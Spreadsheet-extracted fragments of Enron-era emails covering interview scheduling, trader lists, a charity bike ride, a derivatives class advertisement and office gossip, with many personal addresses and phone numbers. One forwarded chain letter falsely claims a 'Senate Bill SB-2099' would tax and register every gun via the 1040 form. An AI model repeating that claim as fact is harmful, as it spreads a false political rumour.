    <t>Thu, 17 Jan 2002 05:23:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lreichel@calpine.com'})</t>
  </si>
  <si>
    <t>frozenset({'dschool@enron.com'})</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Lisa Reichel_x000D_
Mgr., Corporate Risk Management_x000D_
Calpine Corporation_x000D_
700 Louisiana Street, Suite 2700_x000D_
Houston, Texas  77002_x000D_
713-830-8841 Direct_x000D_
713-830-8902 Fax</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 08:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>An interview</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
Please schedule an interview with Konstantin on May 8._x000D_
_x000D_
Stinson, Zimin, Alex, Tanya, Krishna, myself._x000D_
_x000D_
_x000D_
Vince_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 05/02/2001 _x000D_
03:07 PM ---------------------------_x000D_
_x000D_
_x000D_
"Konstantin N. Kudin" &lt;kostya@rice.edu&gt; on 05/02/2001 01:39:15 PM_x000D_
To: &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: An interview_x000D_
_x000D_
_x000D_
 Dear Dr. Kaminski_x000D_
_x000D_
 We have talked earlier during your energy class at Rice about career_x000D_
opportunities in risk management at Enron. If it is possible, I would like_x000D_
to meet with you and people from your group next week, preferably Tuesday_x000D_
(May 8). My time is flexible, I could come any time. Other days are also_x000D_
fine._x000D_
_x000D_
 Thank you very much in advance._x000D_
_x000D_
 Sincerely,_x000D_
 Konstantin Kudin_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 16:41:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'m..love@enron.com', 'tammie.schoppe@enron.com', 'kimberly.hillis@enron.com', 'sally.beck@enron.com', 'c..gossett@enron.com', 'cassi.wallace@enron.com', 'david.baumbach@enron.com', 'loretta.brooks@enron.com', 'm.hall@enron.com', 'rick.buy@enron.com', 'cassandra.schultz@enron.com', 'frank.hayden@enron.com', 'shona.wilson@enron.com', 'louise.kitchen@enron.com', 'ted.murphy@enron.com', 'john.allison@enron.com', 'liz.taylor@enron.com', 'd..winfree@enron.com', 'beth.apollo@enron.com', 'chris.abel@enron.com', 'errol.mclaughlin@enron.com', 'david.port@enron.com', 'kam.keiser@enron.com', 'john.lavorato@enron.com', 'greg.whalley@enron.com', 'anne.bike@enron.com', 'kenneth.lay@enron.com'})</t>
  </si>
  <si>
    <t>ERV Notification: Violation/Notification Memo</t>
  </si>
  <si>
    <t xml:space="preserve">The report named Violation/Notification Memo, published 10/16/2001 is now available for viewing on the website._x000D_
_x000D_
http://erv.corp.enron.com	</t>
  </si>
  <si>
    <t>Sun, 20 Aug 2000 03:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: New baby Diana Maguire Keeler</t>
  </si>
  <si>
    <t>Congratulations Jeff!  And great pictures - big brother looks a bit happier _x000D_
than the last time I saw him._x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 02:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'paul.choi@enron.com', 'miguel.garcia@enron.com', 'rogers.herndon@enron.com', 'janice.moore@enron.com', 'david.porter@enron.com', 'laura.dewett@enron.com', 'kimberly.allen@enron.com', 'diana.allen@enron.com', 'alton.jackson@enron.com', 'chad.starnes@enron.com', 'genia.fitzgerald@enron.com', 'amy.clemons@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 'monika.causholli@enron.com', 'rhonda.robinson@enron.com', 'dean.laurent@enron.com', 'mark.confer@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'amy.horton@enron.com', 'anna.santucci@enron.com', 'michael.driscoll@enron.com', 'laura.jones@enron.com', 'godfrey.hyde@enron.com', 'joe.quenet@enron.com', 'bert.meyers@enron.com', 'steve.hall@enron.com', 'jan.king@enron.com', 'cara.semperger@enron.com', 'steve.gim@enron.com', 'john.malowney@enron.com', 'debbie.brackett@enron.com', 'claudia.guerra@enron.com', 'billy.braddock@enron.com', 'russell.kelley@enron.com', 'mark.guzman@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'stephanie.piwetz@enron.com', 'joseph.wagner@enron.com', 'lester.rawson@enron.com', 'robert.benson@enron.com', 'kimberly.hundl@enron.com', 'paul.thomas@enron.com', 'kerri.thompson@enron.com', 'd.hunsucker@enron.com', 'jeff.king@enron.com', 'kate.symes@enron.com', 'justin.laverell@enron.com', 'william.bradford@enron.com', 'stewart.rosman@enron.com', 'jesse.bryson@enron.com', 'karla.compean@enron.com', 'edward.baughman@enron.com', 'sharen.cason@enron.com', 'ricardo.perez@enron.com', 'tanya.rohauer@enron.com', 'marcus.nettelton@enron.com', 'chris.mallory@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'michael.kelly@enron.com', 'michael.etringer@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'janet.moore@enron.com', 'chris.dorland@enron.com', 'russell.ballato@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'joseph.piotrowski@enron.com', 'tom.alonso@enron.com', 'bill.rust@enron.com', 'fran.chang@enron.com', 'greg.trefz@enron.com', 'veronica.gonzalez@enron.com', 'john.forney@enron.com', 'benjamin.rogers@enron.com', 'chris.foster@enron.com', 'stanley.cocke@enron.com', 'larry.jester@enron.com', 'clint.dean@enron.com', 'david.ryan@enron.com', 'sean.crandall@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'david.portz@enron.com', 'jennifer.stewart@enron.com', 'karen.lambert@enron.com', 'jon.lewis@enron.com', 'erik.serio@enron.com', 'michael.jacobson@enron.com', 'fletcher.sturm@enron.com', 'kevin.presto@enron.com', 'leslie.hansen@enron.com', 'patrick.hanse@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'mark.fischer@enron.com', 'wendy.conwell@enron.com', 'corry.bentley@enron.com', 'stacey.white@enron.com', 'rebecca.grace@enron.com', 'andy.pace@enron.com', 'evelyn.metoyer@enron.com', 'richard.broussard@enron.com', 'andrea.dahlke@enron.com', 'rika.imai@enron.com', 'mitch.robinson@enron.com', 'rod.nelson@enron.com', 'lisa.brown@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'lawrence.clayton@enron.com', 'juan.padron@enron.com', 'janelle.scheuer@enron.com', 'thresa.allen@enron.com', 'kayne.coulter@enron.com', 'doug.miller@enron.com', 'casey.evans@enron.com', 'jason.choate@enron.com', 'elsie.lew@enron.com', 'gary.justice@enron.com', 'eric.smith@enron.com', 'larry.campbell@enron.com', 'todd.decook@enron.com', 'paul.sims@enron.com', 'jenny.latham@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'kim.durham@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'phillip.platter@enron.com', 'mike.curry@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'matt.motley@enron.com', 'valarie.sabo@enron.com', 'tracy.ngo@enron.com', 'christi.nicolay@enron.com', 'paul.radous@enron.com', 'melissa.ratnala@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'joy.werner@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'clayton.vernon@enron.com', 'george.wood@enron.com', 'holden.salisbury@enron.com', 'grace.kim@enron.com', 'gautam.gupta@enron.com', 'donald.vinson@enron.com', 'lisa.lees@enron.com', 'joe.stepenovitch@enron.com', 'robert.badeer@enron.com', 'brant.reves@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'jason.williams@enron.com', 'john.llodra@enron.com', 'zachary.sampson@enron.com', 'lloyd.will@enron.com', 'leaf.harasin@enron.com', 'ryan.slinger@enron.com', 'gretchen.lotz@enron.com', 'elizabeth.sager@enron.com', 'larry.valderrama@enron.com', 'gwendolyn.williams@enron.com', 'edward.sacks@enron.com', 'narsimha.misra@enron.com', 'matt.lorenz@enron.com', 'holli.krebs@enron.com', 'posey.martinez@enron.com', 'mike.swerzbin@enron.com', 'tom.dutta@enron.com', 'peter.makkai@enron.com', 'shari.stack@enron.com', 'bill.iii@enron.com', 'juan.hernandez@enron.com', 'geir.solberg@enron.com', 'carla.hoffman@enron.com', 'alex.wong@enron.com', 'diana.scholtes@enron.com', 'mark.symms@enron.com', 'leslie.reeves@enron.com', 'audrey.cook@enron.com'})</t>
  </si>
  <si>
    <t>Indianapolis Power and Light Company</t>
  </si>
  <si>
    <t xml:space="preserve">We have received the executed EEI Master Power Purchase and Sale Agreement _x000D_
dated 3/15/2001 from the referenced CP.  Copies will be distributed to legal _x000D_
and credit._x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 02:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cpatman@bracepatt.com', 'aeisenman@earthlink.net', 'james_derrick@enron.com', 'grosenbaum@velaw.com'})</t>
  </si>
  <si>
    <t>I will be away from the office beginning December 13 and returning on_x000D_
December 26.  I will occasionally be checking my voicemail box.  If you_x000D_
need more immediate assistance please call Martin Cominsky at_x000D_
713-627-3490, ext. 122  or email him at Mcominsky@aol.com._x000D_
_x000D_
Thank you, and have a great holiday._x000D_
_x000D_
_x000D_
Jeff Sokoloff_x000D_
_________________________________________________________________x000D_
GET INTERNET ACCESS FROM JUNO!_x000D_
Juno offers FREE or PREMIUM Internet access for less!_x000D_
Join Juno today!  For your FREE software, visit:_x000D_
http://dl.www.juno.com/get/tagj.</t>
  </si>
  <si>
    <t>Mon, 5 Jun 2000 05:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>http://www.acmc.uq.edu.au/~gwd/EnergyExchange.html</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 13:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RIDE START NEWS !!!</t>
  </si>
  <si>
    <t>The composition of the ride start has a slightly different twist and I wanted you to know exactly what to expect.  Enron is still on tap for "first out the gate" and will follow the same schedule I've already sent out - staging for exit at 6:45 am._x000D_
_x000D_
BP also has a very large team.  They they will gather at the BP building on Memorial, and come into the start from Dairy Ashford. We think it is appropriate for them to start just before us to honor their sponsorship role in the bike tour.  They will start from their assembly area on the street, and we will be first out the gate.  Thank you BP!!_x000D_
_x000D_
PLEASE PROMINENTLY DISPLAY YOUR MAXINE MESSINGER RIBBON ON YOUR JERSEY.  We have a photo opportunity with the Houston Chronicle, the sponsor of these ribbons, and it is important to the theme of the ride start for everyone to have them on their bike jerseys.  I'll have some extras there if possible.  The Chronicle will recognize Enron as the top funds contributor to the MS Society in 2000, and we would also like to honor Maxine (Miss Moonlight) at this special moment.  Miss Moonlight recently died from MS.  She covered the celebrity beat for the Chronicle for decades with honesty, loyalty and a spirit of fun.  With unflinching spirit, Maxine faced MS head on, never letting it rob her of her joy, and always generously supporting the cause for a cure.  Miss Moonlight's spirit rides with every one of you who is so generously giving your time, talent, and fundraising energy to this cause._x000D_
_x000D_
THANK YOU, and THANK YOU FOR RIDING WITH ENRON !!</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 10:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jess.hewitt@enron.com'})</t>
  </si>
  <si>
    <t>EWS/EES Aprpoved Trader List</t>
  </si>
  <si>
    <t xml:space="preserve">Please note the following personnel are permitted to trade on behalf of EES:_x000D_
_x000D_
Enron Wholesale Services (EES Gas Desk)_x000D_
_x000D_
Approved Trader List:_x000D_
_x000D_
_x000D_
_x000D_
Name    Title    Region  Basis Only_x000D_
_x000D_
Black, Don   Vice President   Any Desk_x000D_
_x000D_
Hewitt, Jess   Director    All Desks_x000D_
Vanderhorst, Barry  Director    East, West _x000D_
Shireman, Kris   Director    West_x000D_
Des Champs, Joe  Director    Central_x000D_
Reynolds, Roger   Director    West_x000D_
_x000D_
Migliano, Andy    Manager   Central_x000D_
Wiltfong, Jim   Manager   All Desks_x000D_
_x000D_
Barker, Jim   Sr, Specialist   East_x000D_
Fleming, Matt   Sr. Specialist   East - basis only_x000D_
Tate, Paul   Sr. Specialist   East - basis only_x000D_
Driscoll, Marde   Sr. Specialist   East - basis only_x000D_
Arnold, Laura   Sr. Specialist   Central - basis only _x000D_
Blaine, Jay   Sr. Specialist   East - basis only_x000D_
Guerra, Jesus   Sr. Specialist   Central - basis only_x000D_
Bangle, Christina  Sr. Specialist   East - basis only_x000D_
Smith, Rhonda   Sr. Specialist   East - basis only_x000D_
Boettcher, Amanda  Sr. Specialist   Central - basis only_x000D_
Pendegraft, Sherry  Sr. Specialist   East - basis only_x000D_
Ruby Robinson   Specialist   West - basis only_x000D_
Diza, Alain   Specialist   East - basis only_x000D_
_x000D_
Monday, April 16, 2001_x000D_
Jess P. Hewitt_x000D_
Revised_x000D_
Approved Trader List.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 15:37:14 -0800 (PST)</t>
  </si>
  <si>
    <t>VoiceMail Issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
_x000D_
The Telephony Team performed maintenance over the weekend which impacted the user voicemail that moved from 3AC.  Although the Telephony Group is working on restoring the voicemail the problem may not be resolved before Friday._x000D_
_x000D_
_x000D_
ETS Solution Center - Houston, at 713-345-4745_x000D_
ETS Solution Center - Omaha, at 402-398-7454_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 06:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">	Tana Jones_x000D_
	11/07/2000 02:23 PM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Stacy E _x000D_
Dickson/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT, Shari Stack/HOU/ECT@ECT, _x000D_
Harry M Collins/HOU/ECT@ECT, David Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Marie Heard/Enron Communications@Enron Communications, Robbi Rossi/Enron _x000D_
Communications@Enron Communications, John Viverito/Corp/Enron@Enron, Jane _x000D_
McBride/AP/Enron@Enron, Andrea Calo/SA/Enron@Enron_x000D_
		 cc: Bradley Diebner/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Edward _x000D_
Sacks/Corp/Enron@Enron, Karen Lambert/HOU/ECT@ECT, Lisa Lees/HOU/ECT@ECT, _x000D_
Stephanie Sever/HOU/ECT@ECT_x000D_
		 Subject: RUSH Approval - ANP Power Marketing Company_x000D_
_x000D_
The above counterparty should be coming on tonight's list.  We would like to _x000D_
open them for gas ASAP, and Credit is reviewing the financials now to give _x000D_
them some headroom on power.  If you could let me know ASAP whether you have _x000D_
any issues._x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Mar 2002 04:19:45 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'deanrogers@energyclasses.com'})</t>
  </si>
  <si>
    <t>Derivatives Early Bird 'til March 11, Houston</t>
  </si>
  <si>
    <t>Derivatives For_x000D_
Energy Professionals _x000D_
_x000D_
Two Full Days, April 9 - 10, 2002_x000D_
Early Bird Special Deadline is March 11th_x000D_
Houston, TX_x000D_
_x000D_
For More Information Go To_x000D_
www.kaseco.com/classes/derivatives.htm _x000D_
_x000D_
_x000D_
Energy and Power Consumers and Producers? _x000D_
_x000D_
Are you a consumer that hesitated to buy forward in 2000 or bought too soon last year?  Are you a producer who hedged too early in 2000 and did not hedge enough in early 2001?  Did you take undue credit risk because you did not know how to estimate exposure?  Are you comforting yourself with the fact that you did not hedge to make money?  Let's face it - you did not hedge to lose money either.  Kase's Derivatives for Energy Professionals will provide you with the indispensable strategies and tactics you need to avoid costly errors and equip you to make the important hedging decisions necessary for survival in today's treacherous marketplace. _x000D_
_x000D_
Content_x000D_
*	The Derivatives Market _x000D_
*	Buying and Selling Forward _x000D_
*	Hedging Long and Short Positions _x000D_
*	Trigger Deals, EFP's, Swaps _x000D_
*	Hedging Spreads and Basis _x000D_
*	Volatility and Options _x000D_
*	Hedging with Options _x000D_
*	Hedging with "Exotics" _x000D_
*	Market Behavior in Favorable Price Environments _x000D_
*	Market Behavior in Adverse Price Environments _x000D_
*	Developing a Strategy to Match Risk Appetite _x000D_
*	Selecting Appropriate Instruments _x000D_
*	Developing Policies and Procedures  _x000D_
_x000D_
_x000D_
_x000D_
In This Class You Will Learn About _x000D_
_x000D_
*	How futures and OTC derivatives work_x000D_
*	Hedging prices, basis, margins, and spreads _x000D_
*	Math for volatility, VAR, Monte Carlos _x000D_
*	Options, including puts, calls, floors, caps, synthetics, and more _x000D_
*	Cost-reducing hedge strategies, such as three-way collars, option spreads _x000D_
*	How the market behaves, including how long bull and bear markets typically last, how contango or backwardation effects hedging, the impact of removing hedges _x000D_
*	What hedge maturities should be used _x000D_
*	Considerations for custom strategies _x000D_
*	Developing policies and procedures _x000D_
_x000D_
------------------------------------------------------------------------_x000D_
_x000D_
Registration Fees Include a Copy of Kase's video "Effective Risk Management"_x000D_
_x000D_
_x000D_
_x000D_
Early Bird Deadline is March 11_x000D_
_x000D_
Early Bird Special:  $895.00 _x000D_
Two or More Early Bird:  $825.00_x000D_
Regular:  $995.00_x000D_
Two or More:  $895.00 _x000D_
_x000D_
Marriott West Loop, Houston _x000D_
_x000D_
$135 Per Night   Kase Class Rate_x000D_
(713) 960-0111 Reservations Phone_x000D_
(713) 624-1517 Reservations Fax_x000D_
1750 West Loop South_x000D_
Houston, TX  77027 _x000D_
_x000D_
For More Information Go To_x000D_
www.kaseco.com/classes/derivatives.htm   _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This email has been sent to kevin.hyatt@enron.com,_x000D_
 by PowerMarketers.com._x000D_
_x000D_
Visit our Subscription Center to edit your interests or unsubscribe._x000D_
http://ccprod.roving.com/roving/d.jsp?p=oo&amp;m=1000838503237&amp;ea=kevin.hyatt@enron.com_x000D_
_x000D_
View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp_x000D_
_x000D_
Powered by_x000D_
Constant Contact(R)_x000D_
www.constantcontact.com</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 03:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'greg.couch@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Fw: Senate Bill SB-2099</t>
  </si>
  <si>
    <t xml:space="preserve">I got this from some hunter friends.  Thought you would like to read it._x000D_
_x000D_
DG    3-9573_x000D_
---------------------- Forwarded by Darron C Giron/HOU/ECT on 09/19/2000 _x000D_
10:15 AM ---------------------------_x000D_
_x000D_
_x000D_
Alton Smith &lt;altsmith@cisco.com&gt; on 09/15/2000 08:25:26 AM_x000D_
To: mail143232@pop.net_x000D_
cc: byd@digitex.net, david_craft@wbw-pc.com, imopiano@io.com, _x000D_
geoterri@flash.net, ghammond@mdavidlowe.com, jeff_graham@condley.com, _x000D_
Mfowler1@airmail.net, nealk@wt.net, randy.g.kruger.jr@arthuranderson.com, _x000D_
sschroed@us.ca-indosuez.com, b3wells@aol.com, Darron C Giron/HOU/ECT@ECT, _x000D_
dennis.patrick@telops.gte.com, Abel_Acosta@cca.court.state.tx.us, _x000D_
mail143232@pop.net, randy@mcdonaldinc.com, Eric.Gunther@sabre.com, _x000D_
eric.kupper@sabre.com, rambo1@oknet1.net, ClintonMur@aol.com, _x000D_
wwhent@lipan.net, Sgt_Maj@email.msn.com, fbarowsk@cisco.com, _x000D_
jeff@huntingwithjeff.com _x000D_
Subject: Fwd: Fw: Senate Bill SB-2099_x000D_
_x000D_
_x000D_
_x000D_
Sorry for the wide distribution.  However, I thought all my hunting buddies _x000D_
should be aware of what's going on.  Who knows we may be asked to register _x000D_
sling shots in the future._x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
&gt;From: "Jim  Hamilton" &lt;jrham@worldnet.att.net&gt;_x000D_
&gt;To: "Alton Smith" &lt;altsmith@cisco.com&gt;_x000D_
&gt;Subject: Fw: Senate Bill SB-2099_x000D_
&gt;Date: Fri, 15 Sep 2000 07:45:34 -0500_x000D_
&gt;X-Mailer: Microsoft Outlook Express 4.72.3110.5_x000D_
&gt;_x000D_
&gt;This along with the other smoke and mirrors is becoming the norm for our_x000D_
&gt;Government. WHY do they fear honest law abiding citizens exercising their_x000D_
&gt;2nd amendment constitutional rights? If anyone thinks that the NRA is a_x000D_
&gt;little club of paranoid reactive, they should review their feelings. Send_x000D_
&gt;this on to everyone you know.  It is time to vote and let these individuals,_x000D_
&gt;that suppose they are above the law and can rewrite and violate our_x000D_
&gt;constitutional rights, know they are mistaken. These people know it would be_x000D_
&gt;very difficult to eliminate our rights through the front door and in the_x000D_
&gt;light of day. They will seek any and all methods to accomplish these agendas_x000D_
&gt;behind the scenes._x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Martin Burnett &lt;mtdburnett@hotmail.com&gt;_x000D_
&gt;To: barandbag@mediaone.net &lt;barandbag@mediaone.net&gt;; P015@persnet.navy.mil_x000D_
&gt;&lt;P015@persnet.navy.mil&gt;; GRANATHA@aol.com &lt;GRANATHA@aol.com&gt;;_x000D_
&gt;allanwendt@hotmail.com &lt;allanwendt@hotmail.com&gt;; ahansen367@home.com_x000D_
&gt;&lt;ahansen367@home.com&gt;; rjwolfe@mlt.uspa-ira.com &lt;rjwolfe@mlt.uspa-ira.com&gt;;_x000D_
&gt;flyov10s@aol.com &lt;flyov10s@aol.com&gt;; perrymm89@yahoo.com_x000D_
&gt;&lt;perrymm89@yahoo.com&gt;; cnaarndt@aol.com &lt;cnaarndt@aol.com&gt;; mamzic1@aol.com_x000D_
&gt;&lt;mamzic1@aol.com&gt;; smokinf18@aol.com &lt;smokinf18@aol.com&gt;;_x000D_
&gt;davidson.morse@morgankeegan.com &lt;davidson.morse@morgankeegan.com&gt;;_x000D_
&gt;Doerings2@aol.com &lt;Doerings2@aol.com&gt;; DDBaggett@aol.com_x000D_
&gt;&lt;DDBaggett@aol.com&gt;; keprice95@aol.com &lt;keprice95@aol.com&gt;; stearns@hctc.net_x000D_
&gt;&lt;stearns@hctc.net&gt;; smithgh@rocketmail.com &lt;smithgh@rocketmail.com&gt;;_x000D_
&gt;greg.fred@juno.com &lt;greg.fred@juno.com&gt;; delvoeg@aol.com &lt;delvoeg@aol.com&gt;;_x000D_
&gt;jrham@worldnet.att.net &lt;jrham@worldnet.att.net&gt;; jrham51@yahoo.com_x000D_
&gt;&lt;jrham51@yahoo.com&gt;; btarlton@aol.com &lt;btarlton@aol.com&gt;;_x000D_
&gt;jeffhardee@hotmail.com &lt;jeffhardee@hotmail.com&gt;; Mitch3p@aol.com_x000D_
&gt;&lt;Mitch3p@aol.com&gt;; bchdriver1@aol.com &lt;bchdriver1@aol.com&gt;;_x000D_
&gt;jeffrey.kuhn@autozone.com &lt;jeffrey.kuhn@autozone.com&gt;; jwconnors@aol.com_x000D_
&gt;&lt;jwconnors@aol.com&gt;; johnnycme@aol.com &lt;johnnycme@aol.com&gt;;_x000D_
&gt;pjschmitt@fedex.com &lt;pjschmitt@fedex.com&gt;; JBrown8245@aol.com_x000D_
&gt;&lt;JBrown8245@aol.com&gt;; Delta75@aol.com &lt;Delta75@aol.com&gt;; KAPD39@aol.com_x000D_
&gt;&lt;KAPD39@aol.com&gt;; Ringledoc1@aol.com &lt;Ringledoc1@aol.com&gt;;_x000D_
&gt;Raymo1@ix.netcom.com &lt;Raymo1@ix.netcom.com&gt;; prendad@aol.com_x000D_
&gt;&lt;prendad@aol.com&gt;; r.r.cameron@worldnet.att.net_x000D_
&gt;&lt;r.r.cameron@worldnet.att.net&gt;; RayfieldRS@hqda.army.mil_x000D_
&gt;&lt;RayfieldRS@hqda.army.mil&gt;; ronbo@newbernnc.com &lt;ronbo@newbernnc.com&gt;;_x000D_
&gt;PILOTFA@aol.com &lt;PILOTFA@aol.com&gt;; SMcNabb@ENERGY.TWC.com_x000D_
&gt;&lt;SMcNabb@ENERGY.TWC.com&gt;; scotkilt@m3.sprynet.com &lt;scotkilt@m3.sprynet.com&gt;;_x000D_
&gt;wedgewise@aol.com &lt;wedgewise@aol.com&gt;; stevesande@aol.com_x000D_
&gt;&lt;stevesande@aol.com&gt;; vsorlie@home.com &lt;vsorlie@home.com&gt;; weshope@juno.com_x000D_
&gt;&lt;weshope@juno.com&gt;_x000D_
&gt;Date: Thursday, September 14, 2000 10:53 PM_x000D_
&gt;Subject: Senate Bill SB-2099_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;&gt;FRIENDS,_x000D_
&gt;&gt;PLEASE FORGIVE THE LARGE LIST.  THIS COULD BE A BIG DEAL TO SOME OR ALL OF_x000D_
&gt;&gt;YOU.  AN OLD AND RELIABLE MARINE FRIEND OF MINE SENT THIS.  TAKE A LOOK AND_x000D_
&gt;&gt;ACT ACCORDING TO YOUR OWN CONSCIENCE._x000D_
&gt;&gt;THANKS,_x000D_
&gt;&gt;MARTY_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;&gt;From: "Joe &amp; Norma Morris" &lt;sbeanokie@tah-usa.net&gt;_x000D_
&gt;&gt;&gt;To: Undisclosed-Recipient:;@tah-usa.net_x000D_
&gt;&gt;&gt;Subject: Senate Bill SB-2099_x000D_
&gt;&gt;&gt;Date: Thu, 14 Sep 2000 19:56:58 -0500_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;Got this last night,_x000D_
&gt;&gt;&gt;Thought  all you guys who may not have known before would like to see what_x000D_
&gt;&gt;&gt;is going on behind the scenes  with the IRS now. Very disturbing_x000D_
&gt;&gt;&gt;Bill_x000D_
&gt;&gt;&gt;---- Original Message -----_x000D_
&gt;&gt;&gt;From: Bryant L. Metler_x000D_
&gt;&gt;&gt;To: Zana Smith_x000D_
&gt;&gt;&gt;Sent: Wednesday, September 13, 2000 8:38 PM_x000D_
&gt;&gt;&gt;Subject: Be aware, Bill -- The following message is for you and freedom_x000D_
&gt;&gt;&gt;loving Oklahomans_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;The following was forwarded to me today by my son David;  we will_x000D_
&gt;&gt;&gt;immediately begin the battle against this end-run around the Constitution_x000D_
&gt;&gt;&gt;!!!_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;Subject:  Fw: This is not good!_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;I have read this Senate Bill, this message is serious._x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;Tim_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt; &gt; OK folks, time to let them know...Toll free number: 888-449-3511_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; Senate Bill SB-2099 will require us to put on our 2000 1040 federal tax_x000D_
&gt;&gt;&gt; &gt; form_x000D_
&gt;&gt;&gt; &gt; all guns that you have or own. It may require fingerprints and a tax of_x000D_
&gt;&gt;&gt;$50_x000D_
&gt;&gt;&gt; &gt; per gun.  This bill was introduced on Feb. 24. This bill will become_x000D_
&gt;&gt;&gt;public_x000D_
&gt;&gt;&gt; &gt; knowledge 30 days after it is voted into law. This is an amendment to_x000D_
&gt;&gt;&gt;the_x000D_
&gt;&gt;&gt; &gt; Internal Revenue Act of 1986. This means that the Finance Committee can_x000D_
&gt;&gt;&gt; &gt; pass_x000D_
&gt;&gt;&gt; &gt; this without the Senate voting on it at all. The full text of the_x000D_
&gt;&gt;&gt;proposed_x000D_
&gt;&gt;&gt; &gt; amendment is on the U.S. Senate homepage. &lt;http://www.senate.gov/&gt;&gt;&gt; &gt; _x000D_
&lt;http://www.senate.gov/&gt; &gt; You can find the bill by doing a search by_x000D_
&gt;&gt;&gt;the_x000D_
&gt;&gt;&gt; &gt; bill number. (SB-2099)_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; You know who to call; I strongly suggest you do.  Please send a copy of_x000D_
&gt;&gt;&gt; &gt; this_x000D_
&gt;&gt;&gt; &gt; e-mail to every gun owner you know to help._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; STOP this bill!!_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;__________________________________________________________________________x000D_
&gt;&gt;Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com._x000D_
&gt;&gt;_x000D_
&gt;&gt;Share information about yourself, create your own public profile at_x000D_
&gt;&gt;http://profiles.msn.com._x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;_x000D_
Alton Smith_x000D_
_x000D_
Systems Engineer_x000D_
Global Systems Integrators_x000D_
Cisco Systems_x000D_
_x000D_
Office:  972-364-8802_x000D_
Pager:  800-365-4578_x000D_
_x000D_
http://www.cisco.com/go/uschannels/_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 01:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Guess what I found out this morning.   It looks like I'll be rotating out of _x000D_
this job just in time.  Jeff said Louise Kitchen is just like Shankman.  _x000D_
Yikes...  We've (Jeff and I) not to tell Binh anything about her.  Lavo _x000D_
stresses her out, so I don't think she'd take the job if she knows it's only _x000D_
going to get worse!!  </t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 03:51:00 -0800 (PST)</t>
  </si>
